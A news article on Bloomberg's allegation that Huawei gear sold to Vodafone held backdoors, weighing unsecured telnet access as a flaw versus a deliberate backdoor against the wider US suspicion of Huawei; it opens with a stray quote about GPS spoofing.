“I can spoof GPS in synch with this [ILS] spoofing,” Ranganathan said. “It’s a matter of how motivated the attacker is.”

Bloomberg alleges Huawei routers and network gear are backdoored

5G Logo in the shape of a butterfly.

Enlarge / PORTUGAL – 2019/03/04: 5G logo is seen on an android mobile phone with Huawei logo on the background.

Vodafone, the largest mobile network operator in Europe, found backdoors in Huawei equipment between 2009 and 2011, reports Bloomberg. With these backdoors, Huawei could have gained unauthorized access to Vodafone’s “fixed-line network in Italy.” But Vodafone disagrees, saying that while it did discover some security vulnerabilities in Huawei equipment, these were fixed by Huawei and in any case were not remotely accessible, and hence they could not be used by Huawei.

Bloomberg’s claims are based on Vodafone’s internal security documentation and “people involved in the situation.” Several different “backdoors” are described: unsecured telnet access to home routers, along with “backdoors” in optical service nodes (which connect last-mile distribution networks to optical backbone networks) and “broadband network gateways” (BNG) (which sit between broadband users and the backbone network, providing access control, authentication, and similar services).

In response to Bloomberg, Vodafone said that the router vulnerabilities were found and fixed in 2011 and the BNG flaws were found and fixed in 2012. While it has documentation about some optical service node vulnerabilities, Vodafone continued, it has no information about when they were fixed. Further, the network operator said that it has no evidence of issues outside Italy.

The sources speaking to Bloomberg contest this. They claim that the vulnerabilities persisted after 2012 and that the same flaws could be found in Vodafone-deployed Huawei equipment in the UK, Germany, Spain, and Portugal. In spite of this, Vodafone continued to buy equipment from the Chinese firm because it was so cost competitive.

The sources also claim that the story was not so simple as “Vodafone reports bug, Huawei fixes bug.” Vodafone Italy found that Huawei’s routers had unsecured telnet access, and the company told Huawei to remove it. Huawei told Vodafone that it had done so, but further examination of the routers found that telnet could be re-enabled. Vodafone told Huawei that Vodafone wanted it removed entirely, only to be told by Huawei that the company needed to keep it for testing and configuration.

The Bloomberg report doesn’t offer any detail on the other alleged “backdoors” in the gateways or service nodes.

When is a front door a backdoor?

The accuracy of Bloomberg’s report hinges on the distinction between a vulnerability and a backdoor. A vulnerability is an accidental coding error that permits unauthorized parties to access the router (or other hardware). A backdoor, in contrast, is a deliberately written piece of code that permits unauthorized parties to access the router. While a backdoor could be written such that it’s obvious that it’s a backdoor (for example, one could imagine an authentication system that allowed anyone to log in with the password “backdoor”), any competent backdoor will look either like a legitimate feature or an accidental coding error.

Telnet access, for example, is a common feature of home routers. Typically, the telnet interface gives greater control over the router’s behavior than is available through the Web-based configuration interface that these devices usually have. The telnet interface is also easier to automate, making it easier to preconfigure the devices so that they’re properly set up for a particular ISP’s network. Even Huawei’s initial response to Vodafone’s request, which allowed users to re-enable the telnet service, isn’t out of the ordinary: it’s common for the Web front-ends to allow telnet to be turned off and on. Vodafone’s assertion that the telnet service wasn’t accessible from the Internet is also likely to be true; typically, these telnet services are only accessible from the local network side, not from the Internet IP address.

As such, Vodafone and Huawei’s posture that this isn’t a backdoor at all is entirely defensible, and Huawei has done nothing that’s particularly out of the ordinary. This is not to say that the hardware is not backdoored—routers with unauthenticated remote access or bypassable authentication have been found in the past and are likely to be found in the future, too. But there’s no indication that these particular Huawei issues are an attempt to backdoor the routers, and nothing in the Bloomberg report corroborates this specific claim.

What there is, however, is a concern fueled by the US government that Huawei wishes to compromise or undermine networks and systems belonging to the US and Europe, as well as a concern that the company tries to unlawfully use intellectual property taken from Western countries. Among Chinese firms, Huawei is viewed with particular suspicion due to its ties to the Chinese military.

Huawei’s CFO was arrested in Canada on behalf of the United States, which says that Huawei has violated the US sanctions against Iran, and the company has also been indicted for stealing robotic phone-testing technology from T-Mobile. The US government has pressured domestic companies to not buy or sell Huawei hardware, and more broadly, the US has pushed its allies to avoid Huawei network hardware. Examination of Huawei’s firmware and software by the UK government has revealed a generally shoddy approach to security, but these problems appear to be buggy code that was carelessly written and leaves systems hackable rather than deliberate insertion of backdoors.

This pressure is particularly acute when it comes to deploying 5G networks. Huawei’s 4G hardware is already widely deployed in Europe, and Huawei’s 5G hardware is aggressively priced and seen as critical to the timely deployment of 5G infrastructure in Europe. Vodafone, for its part, continued to buy Huawei gear until January of this year; further purchases have been paused because of the concerns about the company.